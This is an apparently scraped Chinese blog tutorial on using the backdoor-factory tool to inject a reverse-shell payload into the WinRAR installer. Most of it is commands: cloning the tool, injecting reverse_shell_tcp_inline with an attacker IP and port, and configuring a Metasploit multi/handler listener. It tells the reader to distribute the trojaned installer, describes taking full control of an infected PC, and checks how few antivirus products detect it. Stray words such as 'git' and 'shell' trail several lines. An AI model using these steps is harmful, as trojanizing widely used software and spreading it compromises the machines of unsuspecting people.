咱們的網絡不安全
https://www.youtube.com/watch?v=nJF9OTscFiQhtml
此次咱們用到的程序叫backdoor-factory,爲完整的程序注入後門程序。具體的請網上查看。linux
在kali linux系統上集成了該程序,可是注入後的程序顯示爲空文件(大小爲0).故在ubuntu上手動安裝嘗試了一下,看咱們的網絡是否夠安全。git
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
sudo chmod +x ./install.sh
sudo ./backdoor.py
本次使用的軟件爲 https://rarlab.com/rar/winrar-x64-561.exe
以後將在此程序中注入後門github
執行 ./babackdoor.py -f winrar-x64-561.exe -S
能夠看到此程序支持代碼注入
執行 ./babackdoor.py -f winrar-x64-561.exe -s show
查看支持哪幾種注入方式
shell
執行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234
ubuntu
reverse_shell_tcp_inline 注入方式
172.17.170.38 攻擊者ip,以後受害者主機來訪問該ip
1234 攻擊者端口,以後受害者主機來訪問該端口windows
選擇注入的位置:安全
均可以,這裏咱們選擇2
完成。能夠在指定目錄下找到該文件。
到這裏就注入完成了。服務器
服務器等待中招的pc鏈接。
設置服務器。打開kali linux系統。網絡
#msfconsole msf> use multi/handler msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp msf exploit(handler) > set LPORT 1234 msf exploit(handler) > set LHOST 172.17.170.38 msf exploit(handler) > exploit
將注入好的程序散發出去。若是有計算機不幸中招。
當有中招的pc代開注入後門的程序後,服務器端會有響應。
能夠看到172.17.172.223連入服務器。這時候,你就能夠全權控制223這臺主機了。
能夠看到被控制的主機信息。(編碼格式可能不對,出現亂碼)
對於注入後門程序的程序,會不會成功被檢測到呢。我用的火絨殺毒,雙擊以後立馬報警。
對於其餘殺毒軟件看看什麼狀況,能夠看到可以查殺到此後門的殺毒軟件並很少。
實際上,該程序官網下載的源文件也可能會被誤殺
殺毒能夠參考網站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/
Backdoor factory – How to inject shell-code into windows application